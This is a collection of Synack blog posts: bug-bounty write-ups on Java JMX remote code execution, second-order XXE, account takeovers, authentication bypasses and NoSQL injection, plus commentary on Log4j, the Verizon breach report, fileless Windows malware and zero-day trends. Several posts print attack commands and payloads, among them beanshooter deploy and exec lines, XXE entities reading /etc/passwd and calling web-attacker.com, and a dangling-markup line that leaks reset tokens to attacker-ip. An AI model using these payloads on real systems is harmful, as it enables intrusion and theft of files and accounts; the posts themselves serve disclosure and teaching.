Nicolas Krassas is a member of the Synack Red Team and has earned distinctions such as SRT Envoy and Guardian of Trust.

Of all the Synack targets, my favorite ones are always host assessments. There, one can find a multitude of services with different configurations, versions and usage. One that always caused me trouble was the Java RMI case, until I decided to spend time reviewing the process step by step.

Throughout the years there were several targets where skilled Synack Red Team (SRT) members were able to successfully exploit vulnerabilities with Remote Code Execution, and this information in many cases was missing from my arsenal. I set a goal to find out how the exploitation was taking place and to be able to better understand the tools and methods to finding and exploiting it.

A few “good to know” items:

What is Java RMI used for?

The Java Remote Method Invocation (RMI) system allows an object running in one Java virtual machine to invoke methods on an object running in another Java virtual machine. RMI provides for remote communication between programs written in the Java programming language.

What is JMX?

Wikipedia describes Java Management Extensions (JMX) as follows, “Java Management Extensions (JMX) is a Java technology that supplies tools for managing and monitoring applications, system objects, devices (such as printers) and service-oriented networks.”

JMX is often described as the “Java version” of SNMP (Simple Network Management Protocol). SNMP is mainly used to monitor network components like network switches or routers. Like SNMP, JMX is also used for monitoring Java-based applications. The most common use case for JMX is monitoring the availability and performance of a Java application server from a central monitoring solution like Nagios, Icinga or Zabbix.

JMX also shares another similarity with SNMP: While most companies only use the monitoring capabilities, JMX is actually much more powerful. JMX allows the user not only to read values from the remote system, it can also be used to invoke methods on the system.

JMX fundamentals: MBeans

JMX allows you to manage resources as managed beans (MBean). An MBean is a Java Bean class that follows certain design rules of the JMX standard. An MBean can represent a device, an application or any resource that needs to be managed over JMX. You can access these MBeans via JMX, query attributes and invoke Bean methods.

The JMX standard differs between various MBean types; however, we will only deal with the standard MBeans here. To be a valid MBean, a Java class must:

• Implement an interface
• Provide a default constructor (without any arguments)
• Follow certain naming conventions, for example implement getter/setter methods to read/write attributes

MBean server

An MBean server is a service that manages the MBeans of a system, which we’ll see demonstrated in an attack later in this post. Developers can register their MBeans in the server following a specific naming pattern. The MBean server will forward incoming messages to the registered MBeans. The service is also responsible for forwarding messages from MBeans to external components.

After we have a JMX service running on RMI, we can go through the various ways such a service might be attacked. Over time, various attack techniques have been discovered that are related to JMX over RMI, and we will step through most of them one by one.

Abusing available MBeans

Applications are able to register additional MBeans, which can then be invoked remotely. JMX is commonly used for managing applications, therefore the MBeans are often very powerful.

A failed start

Starting research on the topic, the first items that one will see are references to rmiscout, an exceptional tool on the time that was created but not maintained anymore for over two years with several issues on deployment. At that time I moved on BaRMie, which surprisingly is even older than rmiscout but easier to work with for basic recon. An alternative tool, under the name mjet, seems to be more updated and somewhat easier to use but still my results were poor. As one can see right away, many times simply taking a tool from the shelves and trying to work with it is not a solution.

Back to school

Simply using the tools without understanding exactly what they do won’t work in the long run and that’s something that I was aware of from the start. But everybody is looking for shortcuts.  Back to reading then, and starting with posts such as this one and this one. I ended up on a relatively recent presentation from Tobias Neitzel, where he also presented his tools, RMG and Beanshooter.

New tools, new methods

With a better understanding and with a pair of excellent tools, the results were the following over the next months. 

On a target with several weeks already being launched, the RMI service was not noticed or exploited at that time. The following steps provided an RCE case.

Identifying:

root@pd-server:~/tools/rmi/beanshooter# java -jar beanshooter-3.0.0-jar-with-dependencies.jar  enum server_ip 9999

Tonka bean deployment:

root@pd-server:~/tools/rmi/beanshooter# java -jar beanshooter-3.0.0-jar-with-dependencies.jar tonka deploy server_ip 9999 –stager-url http://tupoc:8888 –no-stager

On our Tupoc (external Synack collaborator system) 

Waiting for a callback:

root@pd-server:~/tools/rmi/beanshooter# java -jar beanshooter-3.0.0-jar-with-dependencies.jar stager xxx.xx.xx.xx 8888 tonka

Verification:

root@pd-server:~/tools/rmi/beanshooter# java -jar beanshooter-3.0.0-jar-with-dependencies.jar  tonka status server_ip 9999 

Command execution:

root@pd-server:~/tools/rmi/beanshooter# java -jar beanshooter-3.0.0-jar-with-dependencies.jar  tonka exec server_ip 9999 id

The case was awarded with a full RCE reward.

Not all cases will happen to be straightforward and in rare occasions issues might arise, but with better understanding of the process and the tools, we are always able to achieve better results.

References:
https://www.youtube.com/watch?v=t_aw1mDNhzI (Amazing work by Tobias Neitzel)
https://docs.jboss.org/jbossas/jboss4guide/r5/html/ch2.chapter.html
https://docs.alfresco.com/content-services/7.0/admin/jmx-reference/

Final notes

During the process, a few issues were identified in the tools that were handled swiftly and additionally an issue was created towards Glassfish repo under, https://github.com/eclipse-ee4j/glassfish/issues/24223.

The post Exploits Explained: Java JMX’s Exploitation Problems and Resolutions appeared first on Synack.

Kuldeep Pandya is a member of the Synack Red Team. You can find him on Twitter or his blog.

This writeup is about my recent discovery of a Second Order XXE that allowed me to read files stored on the web server.

One morning, a fresh target was onboarded and I hopped onto it as soon as I received the email. In the scope, there were two web applications listed along with two postman collections. I prefer postman collections over web apps, so I loaded the collections with their environments into my postman.

After sending the very first request, I noticed that the application was using SOAP API to transfer the data. I tried to perform XXE in the SOAP body but the application threw an error saying “DOCTYPE is not allowed”.

Here, we cannot perform XXE as DOCTYPE is explicitly blocked.

Upon checking all the modules one by one, I came across a module named NormalTextRepository in the postman collection which had the following two requests:

• saveNormalText
• GetNamedNormalText

After sending the first saveNormalText request and intercepting it in Burp Suite, I found out that it contained some HTML-encoded data that looked like this:

Upon decoding, the data looked like this:

<?xml version="1.0"?>
<normal xmlns="urn:hl7-org:v3" xmlns:XX="http://REDACTED.com/REDACTED"><content XX:statu

This quickly caught my attention. This was XML data being passed inside the XML body in a SOAP request (Inception vibes).

I went on to try XXE here as well. For this, I copy pasted a simple Blind XXE payload from PortSwigger:

<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://f2g9j7hhkax.web-attacker.com/XXETEST"> %xxe; ]>

I used Synack’s provided web server to test for this. Upon checking its logs, I found there indeed was a hit for the /XXETEST endpoint.

This still was a blind XXE and I had to turn it into a full XXE in order to receive a full payout. I tried different file read payloads from PayloadsAllTheThings and HackTricks but they did not seem to work in my case.

For me, the XXE was not reflected anywhere in the response. This is why it was comparatively difficult to exploit.

After poking for a while, I gave up with the idea of full XXE and went ahead to check if an internal port scan was possible or not as I was able to send HTTP requests.

I sent the request to Burp Suite’s intruder and fuzzed for the ports from 1 to 1000. The payload for that looked like the following:

<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://127.0.0.1:§1§/XXETEST"> %xxe; ]>

However, the result of the intruder didn’t make any sense to me. All the ports that I fuzzed were throwing random time delays.

I lost all hope and was about to give up on this XXE once again. Then a thought struck, “If this data is being saved in the application, it has to be retrievable in some way as well.” I checked the other GetNamedNormalText request in this module and instantly felt silly. This request retrieved the data that we saved from the first saveNormalText request.

I used the following XXE file read payload and saved the data:

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]>

Then sent the second GetNamedNormalText request to retrieve the saved data. And in the response, I could see the contents of the /etc/passwd file!

This was enough for a proof of concept. However, looking at the JSESSIONCOOKIE, I could tell that the application was built using Java. And, in Java applications, if you just provide a directory instead of a file, it will list down the contents of that directory and return it.

To confirm this theory, I just removed the /passwd portion from the above file read payload. The updated payload looked like this:

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY example SYSTEM "/etc"> ]>

Upon saving the above payload and retrieving it using the second request, we could see the directory listing of the /etc directory!

I sent it to Synack and they happily triaged it within approximately 2 hours.

The post Exploits Explained: Second Order XXE Exploitation appeared first on Synack.

Nikhil Srivastava is a Synack Red Team legend and co-founder of Bsides Ahmedabad.

An Account Takeover (ATO) is an attack whereby attackers take ownership of online accounts using several methods. It is unfortunately more common than you’d think, despite all the warnings to create complex passwords, avoid phishing emails and use multi-factor authentication.

Recent research shows 1 in 5 adults have suffered from an account takeover with  average financial losses of approximately $12,000. Further, PerimeterX reported that 75 to 85% of all attempted logins in the second half of 2020 were account takeover attempts. 

The Digital Shadows Research Team exposed an even more concerning statistic: more than 24 billion account usernames and passwords are available for purchase on the dark web. In some cases, purchasing credentials isn’t necessary, as year after year, the most common password is 123456, appearing in one out of every 200 passwords. 

Now that we know just how common ATOs are, let’s review some of the tactics, techniques and procedures (TTPs) used in such attacks.

Account Takeover Methodologies

• Change Email/Password CSRF – The simplest ATO employs phishing. An attacker sends a link to the victim, and when the unsuspecting user clicks on the link, the victim’s email/password will be changed and the attacker can take over their account.
• OAuth CSRF – Consider a website that allows users to log in using either a classic, password-based mechanism or by linking their account to a social media profile using OAuth. In this case, if the application fails to use the state parameter, an attacker could potentially hijack a user’s account on the client application by binding it to their own social media account.
• Default/Weak Credentials – Most products have their own default credentials for things like servers, routers, and Virtual Network Computing (VNC) that sometimes do not get changed. Many applications lack a strong password policy and will allow users to set weak passwords such as 123456.
• Forgot your password? – Sometimes “forget password” implementations can be vulnerable to password reset token leaks, HTTP leaks, bypassing poor security questions, Host header injection or HTTP Parameter Pollution attacks. 
• Credential Stuffing – In this method, attackers use lists of compromised user credentials to breach a system. Bots can be deployed for automation and scale, based on the assumption that many users reuse usernames and passwords across multiple services.

Examples of Account Takeovers

Here are five anonymized ATO case studies from a variety of industries, including healthcare, software, government and commerce. 

Case Study 1 

In the case of an American chain restaurant, I used trufflehog, a Python search tool, to review the target. While scanning the application, it produced an alert of hard-coded, JavaScript credentials. Browsing the JavaScript, I found some UPS credentials had been hard coded, as shown in the screenshot below.

Using these credentials, I was able to login into their UPS account as an admin which granted me access to sensitive information and control over their shipments.

Case Study 2

Another ATO was for a collaboration software application. While resetting the password for an admin account, I found that the application leaked their password reset token in response, as shown in the screenshot below.

Using this token, I was able to reset the admin password. Sometimes, it really is that simple. 

Case Study 3

This is a case study of a product from a medical equipment company. I tested the whole application without getting any vulnerabilities and at the end decided to check the forget password flow. While requesting the password reset token, the application sent the following request that revealed a path for me to exploit.

I used a Dangling Markup such as <img src=”http://attacker-ip/?id= in the email body before the reset link and sent it to the user. Now as soon as the user opens the email, their password reset token will be sent to me instead.

Case Study 4

The scope of this target was a wildcard and unauthenticated testing only, so I first did some reconnaissance. I found an interesting subdomain that asked for a DVN ID and password to login.

I searched about DVN IDs in help articles, and I found out it’s a 9-digit number assigned to all vendors at the time of licensing.

I did Google searches but didn’t come up with this particular ID. I ended up looking at Google images results in hope that licensing could have been done with paper and could have this ID number included.

Cool, I was correct! Licensing was done on paper and I got a couple of valid DVN IDs in the subject of letters, such as: 

Now that I had this ID, I tried brute-forcing to get a password. When that turned up nothing, I retested the “forget password” flow. It asked for the DVN ID first before resetting the password. I found that the application used two requests for resetting the password. One for querying the password for DVN ID and another one sending a newly generated password to their email ID inside the request itself.

So, this disclosed not only their password but emails too. Using the newly generated password, I was able to login into their account.

Case Study 5 

I was scanning targets for an American food and beverage company when I came across an event application. The application asked for a valid user email to login, and those company emails were whitelisted. I tried with my name@companydomain at first to see the error message and I found the following.

I noticed an email for support was given at the bottom of the page to reach out for any trouble. I thought: Why not attempt it? I entered some information and found the following screen:

The application asked to set the password, and after setting up a password, I was able to login as admin:

Further, while checking the attendee directory, I found multiple accounts that could’ve been taken over using the same method.

Conclusion 

It’s hard to believe that someone with little to no technical experience could gain the level of access that I did, but you should! Account takeovers can be complex, but they can also be relatively simple. All it takes is a bit of creativity and motivation, and just about anyone can login as an admin.

The post Account Takeovers:  Believe the Unbelievable appeared first on Synack.

Ozgur Alp is a member of the Synack Red Team and has been awarded SRT of the Year 2021, Most Trusted Hacker 2021, Mentor of the Year 2022 and SRT Grand Champion for 2019, 2020 and 2021.

Authentication bypass vulnerabilities are common flaws that exist in modern web applications—but they’re not always easy to find. 

New authentication methods are working wonders to boost cybersecurity at many organizations. While tools like single sign-on (SSO) are often an improvement over old ways of logging users in, these technologies can still contain critical vulnerabilities. Whether it’s business logic errors or some other software flaw, it takes a keen eye to comb through all the complexity.

In this blog, I’ll cover five real-world authentication bypass techniques that I have found in the Synack Platform throughout my time as a member of the Synack Red Team. 

Example #1 – Refresh Token Endpoint Misconfiguration

In this case, once a user logged into the application with valid credentials, it created a Bearer Authentication token used elsewhere in the application. This auth token expired after some time. Just before expiration, the application sent a request to the back-end server within the endpoint /refresh/tokenlogin containing the valid auth token in the headers and username parameter on the HTTP body section. 

Further testing revealed that deleting Authorization header on the request and changing the username parameter on the HTTP body created a new valid token for the supplied username. Using this exploit, an attacker with an anonymous profile could generate an authentication token for any user by just supplying their username. 

Example #2 – Improper SSO Configuration

Most applications use SSO systems because they are easier to securely manage than juggling many authentication portals. But simply using SSO does not automatically protect the system: Configurations to the SSO must be secured as well. 

Here, one application was using the Microsoft SSO system for authentication. When visiting the internal.redacted.com URL, the web browser made a redirect to the SSO system:

On first sight, it seemed secure, but analyzing the back-end requests showed the application returned an unusually large content-length (over 40,000 bytes!) on the redirection response. 

Why would an application do this? Well, it was misconfigured. The application was leaking its internal responses to every request while sending the user to the redirection to the SSO. So, it was possible to tamper the responses and change the 302 Found header to 200 OK and delete the entire Location header, giving access to the whole application.

Also, it was possible to make this process automatic by adding Match & Replace rules in Burp Suite to delete the header directly and change the values automatically. 

Example #3 – CMS Based Access Problems

Content management systems (CMS) like WordPress, Drupal and Hubspot need to be securely configured as well, lest they introduce vulnerabilities in your organization.

One popular CMS platform, Liferay, was used in an internal application in one case I examined. The application only had a single login page accessible without authentication, and all other pages were restricted on the application UI.

For those not familiar with Liferay, the CMS uses portlets for application workflow, which have a parameter as p_p_id within numeric numbers. For that application, it was possible to access the login portlet by changing the parameter to value 58. On the normal login page, only the login form was accessible. However, by accessing the portlet directly, it was possible to reach the Create Account functionality, which then allowed self-registration to access internal applications without proper authorization.

Please note that while Liferay used this workflow before, its latest version uses portlet names instead of numeric ids. Still, it is possible to access other portlets by changing names as well.

Example #4 – Usage of Example JWT Tokens

JWT tokens, or JSON web tokens, are popular on new web applications. But while they have a secure mechanism by default, back-end server configuration should be secured, too. 

I worked on an assignment where SSO authentication was used for their internal applications. When visited directly, the application redirected the user to the Microsoft SSO web page. So far, so good. 

However, some JS files were accessible without authentication. Testing revealed that the application used JWT tokens that were sent via the Microsoft SSO system after a secure login. On the back-end mechanism, there was a security misconfiguration that didn’t check if the JWT token was generated for that specific application–instead, it accepted any JWT token that had a valid signature. So, using an example JWT token from Microsoft’s website: 

 

Within generic values:

It was possible to access the internal endpoints, leaking the company data. 

Example #5 – Changing Authentication Type to Null

In this instance, an application was sent all requests on the HTTP post data via base64 encoded XML requests. On the login mechanism, it sent the username as parameter alias and password as scode. The value inside the scode parameter was hashed. A quick analysis showed it used an md5 value of the supplied password value. There was another interesting sign in the request: scode had an attribute as type valued with 2. 

I tried assigning the value to 1, which would accept the cleartext password. It worked! So, brute force within cleartext values was possible. Not a big deal, but it was a sign I was on the right path. What about assigning it to the null values? Or other values such as -1, 0 or 9999999999? Most of them returned an error code except value 0. I tried several things with the attribute 0 but had no luck until I sent the password value as an empty value. 

I realized it was possible to access any account by simply supplying the usernames and empty passwords. It turned out to be quite a big bug. 

Conclusion

Complex authentication mechanisms can fall prey to undiscovered attack vectors, especially on applications prone to business logic flaws. Because automatic scanners mostly fail to key into these kinds of vulnerabilities, human power is still needed to find them. Given the complexity of modern software environments, no single security researcher can pick up on all possible vulnerabilities or attack vectors. On-demand security testing with a vetted community of researchers is the best way to combine everyone’s unique knowledge to find the vulnerabilities that matter. 

You can find Ozgur on  Twitter, LinkedIn and Medium.

The post Exploits Explained: 5 Unusual Authentication Bypass Techniques appeared first on Synack.

When the Log4j vulnerability emerged in December 2021, Synack and our clients’ security teams immediately sensed its urgency. The Synack Red Team began testing within hours of the initial discovery for our customer base. 

Almost a year later, Log4j continues to show up in our pentesting results. Here are some quick stats from our findings:

• 750+ instances of the Log4j (CVE-2021-44228) missions run by SRT researchers since 2021 as part of our zero day response coverage
• 100+ susceptible instances found so far as part of Synack Penetration Testing
• Over 2 million IPs checked to date  

Log4j Is “Endemic,” Says Federal Cyber Board

The Cyber Safety Review Board (CSRB) called Log4j (CVE-2021-44228) an “endemic” vulnerability in the board’s first published report. The group of public and private sector cybersecurity leaders stated that the vulnerability is expected to continue to be a prominent threat for “a decade or longer.”

The CSRB’s consideration of Log4j as a persistent threat points to the critical nature of such zero days. They are not something to be solved in the week they appear, with security teams “working through the weekend” and then moving on. They highlight the larger need for readily available talent and emergency response processes across a longer span of time.

Luckily, there have been no successful Log4j-based attacks to critical infrastructure, according to the CSRB. However, the board urges organizations to continue to mitigate risk related to Log4j and prepare for future zero day vulnerabilities of similar criticality. 

Log4j and the Cyber Talent Gap – Surge Capacity

Nearly two in three organizations say they are understaffed in cybersecurity. But even for those that report having enough cyber talent on hand, the surge demand needed to respond to a vulnerability like Log4j can still be taxing. The CSRB report states:

“Perhaps most significantly, the force exerted on the urgent response and the challenges in managing risk also contributed to professional “burnout” among defenders that may, compounded with the generally intense pace of many cybersecurity jobs, have a long-term impact on the availability of cybersecurity talent.”

Chris Hallenbeck writes for VentureBeat about lessons learned in the face of Log4j, including the fact that the “skills shortage is an existential threat.” If organizations are to effectively prepare for future CVEs and zero days, they must consider their hiring strategies in the face of the cyber talent shortage, while also considering how to deal with potential burnout and stress from surge demand in the face of emergency. 

Preparing for Zero Day Response with Human Talent

The CSRB issued recommendations to mitigate zero day risks, including the documentation of a vulnerability management and response program, and consideration of “cultural shifts” that are “necessary to solve for the nation’s digital security.”

Synack believes that the most effective way to test for a zero day vulnerability is with human expertise. Scanners are not able to detect zero day vulnerabilities until they are updated with a signature for the vulnerability. 

In the face of the cybersecurity talent gap, testing with humans to meet the surge demand of a zero day can be challenging. That’s why on-demand access to a community of researchers is paramount. Synack provides access to such a community, the Synack Red Team, through a SaaS platform, for on-demand zero day response. This talent augmentation can be a key cultural shift for companies struggling to hire or retain cyber talent, and can help prevent an in-house team from experiencing the severe burnout alluded to above.

Within the Synack Platform is a catalog of CVEs that can be tested on-demand by skilled SRT researchers. When Log4j first emerged, it was added to the catalog within hours, and top researchers began testing and collaborating on methodologies. 

After only a few days, Synack had checked over half a million IP addresses confirming the status of thousands of CVE-2021-44228 checks and providing detailed reports containing proof of work and methodologies. 

Contact us today for a conversation about how we can help you mitigate Log4j risk or prepare for future zero days.

The post Preparing for the Next Log4j in the Face of the Cyber Talent Gap appeared first on Synack.

By Kim Crawley

The annual Verizon Data Breach Investigations Report is a wealth of valuable information about the state of cybersecurity today.

Of course, data breaches remain one of the biggest problems in cybersecurity. Many of the worst breaches expose financial data, authentication credentials, and sensitive legal and medical information. In the wrong hands, this data can help cybercriminals access organizations’ and individuals’ most sensitive data and valuable networks.

Ransomware that targets enterprises is also growing. In fact, ransomware incidents are up 13 percent from the previous year, a larger increase than the previous five years combined. Another data breach vulnerability trend is an increase in human exploitation, whether by phishing, stolen credentials or user errors.

The DBIR is a massive report that resulted from Verizon analyzing a large number of data breaches, which they’ve also verified directly for authenticity. Here’s how Verizon determines which breaches to include:

“The incident must have at least seven enumerations (e.g., threat actor variety, threat action category, variety of integrity loss, et al.) across 34 fields or be a DDoS attack. Exceptions are given to confirmed data breaches with less than seven enumerations. The incident must have at least one known VERIS threat action category (hacking, malware, etc.).”

Verizon acknowledges that many data breaches still go undetected. Nonetheless, as organizations improve their systems for detecting indications of compromise (IOCs), there’s a lot of useful data to be analyzed.

Here are five key findings:

1. Web application “hacking” and denial of service attacks are the most common actions that threat actors perform in order to unlawfully access sensitive data in networks. For the sake of the report, hacking is defined as “attempts to intentionally access or harm information assets without (or exceeding) authorization by circumventing or thwarting logical security mechanisms.”
2. Seventy percent of breaches involve web application hacking, 45 percent involve denial of service, 15 percent involve backdoor malware, 15 percent involve ransomware and 10 percent involve email.
3. Malicious access to credentials led to just under 50 percent of breaches, phishing in a bit under 20 percent and vulnerability exploits about 10 percent.
4. Data breaches are mainly caused by external threat actors, but internal threat actors are still a significant risk, too. About 80 percent of threat actors are external to the targeted organization, and 20 percent are internal—an organization’s own employees, contractors and other insiders.
5. Even though internal threat actors conduct fewer attacks, internal attacks expose the most records and therefore lead to more destructive data breaches. External threat actor breaches expose a median of 30,000 records, internal threat actor breaches expose a median of 375,000 records, and threat actors with a partnership relationship (often in the supply chain) expose a median of 187,500 records.

Whenever organizations are testing to see how vulnerable they are to a data breach, it’s important to simulate internal, external and supply chain attacks. Web application pentesting is also more important than ever. As DBIR makes clear, it’s critical that every organization test for unauthorized credential exploitation and phishing attacks, too.

Thank you Verizon for helping our industry better understand data breach threats! For more information about how Synack can help organizations prevent data breaches, get in touch here.

The post Five Big Takeaways from Verizon’s 2022 Data Breach Investigations Report appeared first on Synack.

The exploit that Kaspersky researchers uncovered is unnamed, so we’re calling it “ThrowShell”

By Kim Crawley

The key to cyberattacks evading detection from antivirus software and intrusion detection systems is often to exploit operating system processes. That’s a feature of a recently discovered fileless Windows exploit discovered by Kaspersky researchers.

Fileless malware attacks computer systems without writing new files to a computer’s data storage. If antivirus software scans a hard drive for malware, it won’t find any files related to a fileless attack. It’s a popular obfuscation technique with cyber threat actors. 

Kaspersky hasn’t given this new exploit any particular name. Kaspersky’s Denis Legezo explained that some DLLs (Windows Dynamic Link Libraries) involved in the exploit resemble tools in commercial pentesting platforms:

“Regarding the commercial tools, traces of SilentBreak and Cobalt Strike toolset usage in this campaign are quite visible. Trojans named ThrowbackDLL.dll and SlingshotDLL.dll remind us of Throwback and Slingshot, which are both tools in SilentBreak’s framework, while the ‘sb’ associated with the dropper (sb.dll) could be an abbreviation of the vendor’s name.

Here we want to mention that several .pdb paths inside binaries contain the project’s directory C:\Users\admin\source\repos\drx\ and other modules not named after Throwback or Slingshot, such as drxDLL.dll. However, encryption functions are the same as in the publicly available Throwback code.”

The new exploit puts malicious shellcode into Windows event logs. Cyberattacks that use fundamental code libraries such as “Log4Shell” and “Spring4Shell” are recent concerns in the cybersecurity community. So, I’ll call this attack “ThrowShell.” Maybe it’ll stick.

How “ThrowShell” works

The ThrowShell attack starts by persuading a user to download a file with a Cobalt Strike module. Kaspersky researchers have observed this as a RAR archive file with a Cobalt Strike certificate distributed through file.io, a file sharing site the researchers consider to be legitimate. Yes, “ThrowShell” starts as a Trojan. But interestingly, when I tried to visit file.io in Firefox, my Malwarebytes Browser Guard extension blocked the site as a suspected phishing domain. I’ve personally never visited file.io.

Anti-detection wrappers are used with the Trojans. MSVC, Go compiler 1.17.2 and GCC under MinGW are the compilers researchers have seen. 

Once the RAR file has been extracted and its contents executed, it’s then much easier for the attacker to send additional malicious DLLs to the targeted device. 

Werfault.exe is the initial Windows executable file that’s targeted for code injection by ThrowShell. It’s Microsoft Windows Error Reporting Fault Reporter in Windows 10 and Windows 11. The important role that the process serves in Windows assures that the file is whitelisted in endpoint security applications. It’s almost as sneaky as exploiting svchost.exe, in my opinion.

The malicious executed code is signed with a certificate for an application called “Fast Invest,” which the researchers didn’t see any legitimate code signed with. Once extracted, decrypted and signed, ThrowShell’s malicious code spreads within Windows through dropper injection with Cobalt Strike pentesting software. Explorer.exe, the main file manager for all supported versions of Windows, is one of the processes that ThrowShell targets for code injection. That’s the way fileless malware typically works; inject malicious code into ordinary OS processes and execute it that way. 

While spreading through a variety of ordinary Windows DLLs and processes, shellcode is eventually inserted into Windows event logs. Researchers have seen ThrowShell fingerprint Windows targets for MachineGUID, computer names, local IP addresses, OS version, CPU architecture, and SeDebugPrivilege status in processes currently running in memory.

This is all a really stealthy way to infect client Windows targets, get right into the memory, evade detection, establish persistence, and maintain a backdoor right into the Windows shell. This exploit can possibly sit in a Windows client for months or longer with an easy way for the attacker to perform all kinds of malicious activity with administrative privileges.

The post Why the newly discovered Microsoft Windows ‘fileless’ log exploit is a marvel of stealth appeared first on Synack.

By Kim Crawley

The latest research from zero-day hunters at Google shows that reporting and detection tools are improving. 

Google researchers uncovered more than double the number in-the-wild zero-days last year than any other period since it started tracking these dangerous software vulnerabilities in 2014. 

“Is it that software security is getting worse? Or is it that attackers are using 0-day exploits more? Or has our ability to detect and disclose 0-days increased? When looking at the significant uptick from 2020 to 2021, we think it’s mostly explained by the latter,” according to Maddie Stone, a security researcher at Google Project Zero, the company’s team that tracks zero-days.

In a recent blog post detailing the 2021 findings, the group detailed the 58 zero-days that it detected as well as trends, attack patterns and techniques they were able to identify last year, too. Even though the group uncovered more than double the number of the previous high in 2015 (28 found), attacker techniques haven’t significantly evolved.

“With this record number of in-the-wild 0-days to analyze, we saw that attacker methodology hasn’t actually had to change much from previous years. Attackers are having success using the same bug patterns and exploitation techniques and going after the same attack surfaces,” wrote Stone.

It’s tough enough for organizations to manage and mitigate known vulnerabilities, but zero-day exploits pose a unique challenge to all organizations. They are often the attackers’ most powerful tool and when executed against businesses, organizations and individuals can have devastating consequences. As Google noted, there were many reports of zero-day exploits used against journalists, human rights groups and government officials last year.

Key findings from Google’s Project Zero report:

• The exploits detected in 2021 are very similar to the exploits Google Project Zero detected in previous years. There are new CVE records, but the nature of the vulnerabilities and how they’re exploited are all fairly typical relative to previous trends.
• Sixty-seven percent (or 39) of the zero-days found in 2021 were memory corruption vulnerabilities. How memory is being used is the main vector for zero-day exploits. They include four buffer overflows, four integer overflows, six out-of-bounds read and writes, and 17 use-after-frees. Maybe the Project is getting better at monitoring memory, or maybe volatile data is more ripe for zero-day exploitation than data in storage.
• Nearly all of the 58 zero-days detected in 2021 follow familiar patterns. But there’s one outlier, CVE-2021-30860, which is an integer overflow vulnerability in the CoreGraphics PDF decoder in iOS 14.8 and iPadOS 14.8, macOS Big Sur 11.6 and watchOS 7.6.2. Security researchers Samuel Groß and Ian Beer noted how unusual the exploit is: “The bootstrapping operations for the sandbox escape exploit are written to run on this logic circuit and the whole thing runs in this weird, emulated environment created out of a single decompression pass through a JBIG2 stream. It’s pretty incredible, and at the same time, pretty terrifying.” Indeed, Google Project Zero said it hopes this is a trend of attackers having to work harder to successfully execute a zero-day exploit.
• Some of the exploits involve classic cyberattack techniques, such as phishing and fingerprinting. CVE-2021-21166 and CVE-2021-30551 are great examples. Google Project Zero’s Maddie Stone and Clement Lecigne wrote: “Both of these 0-days were delivered as one-time links sent by email to the targets, all of whom we believe were in Armenia. The links led to attacker-controlled domains that mimicked legitimate websites related to the targeted users. When a target clicked the link, they were redirected to a webpage that would fingerprint their device, collect system information about the client and generate ECDH keys to encrypt the exploits, and then send this data back to the exploit server. The information collected from the fingerprinting phase included screen resolution, timezone, languages, browser plugins and available MIME types.”

 

Essentially, Google wants to make it harder for attackers to carry out zero-days. And there’s some evidence in its research that might be happening. While there’s progress in terms of discovering and disclosing zero-days, Project Zero does say there is still a lot of room for improvement. Specifically, they call on companies to disclose more, share more exploit samples and details of attacker techniques and to work harder to reduce memory corruption vulnerabilities. 

It’s also important that once organizations know about a zero-day, they act quickly to find and fix that vulnerability. That requires vigilance and the right approach to testing with an offensive mindset to ensure an organization’s entire attack surface is hardened against the most sophisticated attackers. 

Get in touch today to learn how Synack can help.

The post Researchers Uncover Record Number of Zero-Days. That’s Actually Good News. appeared first on Synack.

By Kuldeep Pandya

Note: This was originally published on Synack Red Team member’s Kuldeep Pandya’s personal website and is republished here with permission. 

In this article I detail my recent discovery on Synack Red Team, a NoSQL injection.

Please note that this will not be a technical guide on why NoSQL injections exist and their breakdown. I will share the thought process and approach that I had when testing this particular application.

When I got onboarded to this program, it had one application in scope. It was an authenticated test and credentials were provided by the client. Synack’s quality period was also going on, and it had approximately 8 hours.

As always, I fired up Burp Suite, opened Burp’s in-built browser, went to the login page, and started intercepting.

I was closely monitoring every request after clicking “Login.”

First, there was a login request to the /oauth2/token endpoint. This endpoint returned the JWT token that allowed us to access the application APIs. However, no fun here.

After the login request, there was another request to a metadata endpoint. This also was not very interesting as the endpoint returned data that was going to be used to render the frontend.

But after the first two requests, a request to the/api/[CLIENT_NAME]/Customers was sent. This request in particular was very interesting as it had a parameter named$filter. And the parameter had a long NoSQL string inside it.

The request looked like this:

If you look at the value of the$filter parameter, the URL encoded string decodes to the following filter:

This endpoint returned basic customer information like customer name, last login date, etc.

You can see the full request-response pair below:

I had read a few blogs on NoSQL injection in the past. Especially after the HackIM CTF. So I figured this was something related to NoSQL.

Theeq in the$filter is the same as SQL’s= orLIKE.

What the endpoint really did was that it read the value of $filter and then it evaluated the filter and retrieved the data specified in the filter.

To break down the parameters in the above filter:

–id (This was the customer ID. Our current user had the customer ID of 2. If I had changed it to 1 instead of 2, this would have been an easy IDOR.)

–is_active (This was an attribute our user had. Theis_active attribute would beY if our user was active andN if not.)

–id_deleted (This was another attribute to specify if our user was deleted or not.)

The/api/[CLIENT_NAME]/Customers endpoint took the filter and returned our own user(user ID 2)’s data if and only if our user was active and not deleted.

For testing, I removed the later part which was((is_active eq ‘Y’) and (is_deleted eq ‘N’)) and just sent the following filter:

The application happily returned my data without erroring out.

As I was aware that this was NoSQL, I googled “NoSQL wildcards” and tried to play around with wildcards. I came across the following documentation by MongoDB on wildcard indices: https://www.mongodb.com/docs/manual/core/index-wildcard/ 

I played around with wildcards, doing things like$filter=($** eq 2), and some of it worked meanwhile some of it did not.

I also tried to forcefully put wildcards in the value and crafted this payload:$filter=(id eq $**)

But it did not have a valid syntax so it also failed.

I honestly did not put much effort into wildcards as I was not getting the syntax right.

Then a thought popped into my mind. There was one operator in the filter calledeq. What if I use some other operator? Is it possible to do it?

I googled “MongoDB syntax” which led me to this awesome documentation again by MongoDB: https://www.mongodb.com/docs/manual/tutorial/query-documents/ 

The above documentation neatly explains MongoDB syntax with SQL alternative syntax to properly understand it.

However, after going a little further into the documentation, the documentation linked to another documentation page which was about “Query and Projection Operators.” You can find it here: https://www.mongodb.com/docs/manual/reference/operator/query/ 

And this page was exactly what I needed to craft my exploit! The page listed down all the MongoDB operators and their use cases.

I decided to go with the gt operator because I wanted the endpoint to return user details of all the users whose user ID was greater than 0. I had made an assumption that user IDs will start from zero.

For that purpose, I crafted the following payload:

And the application returned the customer information of the other user as well. Sadly, there were only two users and this was a pre-production application. However, I was still happy because I got the info of the other user.

